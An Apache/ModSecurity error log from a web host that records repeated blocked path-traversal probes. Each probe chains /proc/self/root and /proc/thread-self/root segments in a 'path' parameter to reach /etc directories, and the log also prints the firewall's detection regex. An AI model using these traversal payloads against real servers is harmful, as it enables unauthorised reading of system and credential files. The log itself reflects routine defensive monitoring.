[tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuNBuoXxyEfFpUF8f_PtAAAAVc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 02:43:35.020549 2026] [:error] [pid 27293:tid 140411624429312] [client 74.7.228.61:51670] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abuNB_-YZRR_7pZ7nDJLNgAAA84"]
[Thu Mar 19 02:43:38.163409 2026] [proxy_fcgi:error] [pid 26799:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:46568] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:43:41.945029 2026] [:error] [pid 15826:tid 140411725141760] [client 74.7.241.31:34404] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuNC-oXxyEfFpUF8f_PtgAAAUI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 02:43:43.519959 2026] [:error] [pid 19093:tid 140411674785536] [client 74.7.241.31:34418] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuND1_V7PWP6ixUYl55lgAAAog"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 02:43:43.533976 2026] [mime_magic:error] [pid 27403:tid 140411725141760] (70014)End of file found: [client 57.141.18.55:47884] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 02:43:45.797899 2026] [:error] [pid 27403:tid 140411590858496] [client 74.7.241.31:34430] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuNERkFeYa1D6dYQnCqEQAAAdI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 02:43:49.529776 2026] [:error] [pid 14269:tid 140411607643904] [client 74.7.241.31:43998] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuNFQbLMZ6AikZjR9UbBAAAABA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 02:43:52.023485 2026] [:error] [pid 27293:tid 140411582465792] [client 74.7.241.31:44000] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuNGP-YZRR_7pZ7nDJLRwAAA9M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 02:43:55.128579 2026] [:error] [pid 30077:tid 140411599251200] [client 74.7.241.31:44002] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuNG_u8EFLIOrSqIptaBAAAAlE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 02:43:59.354203 2026] [:error] [pid 31803:tid 140411599251200] [client 74.7.241.31:51546] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuNH-yqAr6etmhZHNoh_gAAAFE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 02:44:02.477795 2026] [proxy_fcgi:error] [pid 19093:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:47180] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:44:04.845440 2026] [:error] [pid 27293:tid 140411574073088] [client 74.7.241.31:51548] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuNJP-YZRR_7pZ7nDJLUgAAA9Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 02:44:11.338905 2026] [:error] [pid 30077:tid 140411590858496] [client 74.7.241.31:54160] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuNK_u8EFLIOrSqIptaFgAAAlI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 02:44:14.495020 2026] [:error] [pid 31803:tid 140411607643904] [client 74.7.241.31:54176] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuNLuyqAr6etmhZHNoiDwAAAFA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 02:44:18.303756 2026] [:error] [pid 27293:tid 140411548894976] [client 74.7.241.31:52222] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuNMv-YZRR_7pZ7nDJLXgAAA9c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 02:44:22.465065 2026] [:error] [pid 27403:tid 140411540502272] [client 74.7.241.31:52234] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuNNhkFeYa1D6dYQnCqFwAAAdg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 02:44:25.133837 2026] [proxy_fcgi:error] [pid 17887:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:47610] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:44:28.120185 2026] [mime_magic:error] [pid 26799:tid 140411582465792] (70014)End of file found: [client 57.141.18.30:48836] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 02:44:28.121619 2026] [:error] [pid 14269:tid 140411649607424] [client 74.7.241.31:52244] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuNOwbLMZ6AikZjR9UbDQAAAAs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 02:44:30.935001 2026] [:error] [pid 15826:tid 140411716749056] [client 74.7.241.31:37382] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuNPuoXxyEfFpUF8f_PvgAAAUM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 02:44:33.866490 2026] [:error] [pid 27403:tid 140411641214720] [client 74.7.241.31:37396] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuNQRkFeYa1D6dYQnCqGwAAAcw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 02:44:39.623978 2026] [:error] [pid 27403:tid 140411683178240] [client 74.7.241.31:37396] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuNRxkFeYa1D6dYQnCqHgAAAcc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 02:44:46.516688 2026] [:error] [pid 17653:tid 140411590858496] [client 74.7.241.31:46300] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuNTsdf6f5d65gmYZQwbAAAAtI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 02:44:48.104101 2026] [proxy_fcgi:error] [pid 17887:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:48068] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:44:50.785616 2026] [:error] [pid 31803:tid 140411624429312] [client 74.7.241.31:52458] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuNUuyqAr6etmhZHNoiJwAAAE4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 02:44:55.995129 2026] [:error] [pid 17887:tid 140411607643904] [client 74.7.241.31:52474] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuNVwkwaGbbGflqUZBv-QAAANA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 02:45:01.520539 2026] [:error] [pid 14269:tid 140411741927168] [client 74.7.241.31:55168] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id 